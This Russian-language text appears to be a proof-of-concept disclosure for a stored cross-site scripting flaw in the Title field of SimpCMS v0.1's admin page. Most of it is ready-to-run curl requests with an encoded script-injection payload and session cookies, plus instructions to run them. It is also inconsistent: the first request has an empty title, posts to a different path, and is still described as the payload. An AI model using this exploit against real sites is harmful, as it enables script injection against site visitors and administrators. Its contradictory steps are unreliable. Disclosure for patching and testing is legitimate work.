
Публикация для Cross Site Scripting (XSS) в SimpCMS v0.1 - /SimpCMS/admin.php
Уязвимость межсайтового скриптинга (XSS) в SimpCMS v0.1 позволяет злоумышленникам выполнять произвольные веб-сценарии или HTML через специально созданную полезную нагрузку, внедрённую в поле Title на /admin.php.
После входа в интерфейс администратора SimpCMS скопируйте соответствующие значения Cookie, наблюдаемые на вкладке Application в инструментах разработчика браузера, и отправьте следующий запрос curl:
curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"


Изначальные параметры, наблюдаемые для программного обеспечения SimpCMS, привели к следующей команде cURL, но позже были обновлены:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Пояснение:
- curl: Инструмент командной строки для передачи данных по URL-адресам.
- -X POST: Указывает используемый метод запроса (POST).
- "http://site.com/SimpCMS/admin.php": URL-адрес, на который отправляется запрос.
- -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - Полезная нагрузка POST-запроса.
Запустите эту команду в терминале, чтобы отправить POST-запрос с XSS-полезной нагрузкой. Посетите основной сайт /SimpCMS, и XSS станет видимым.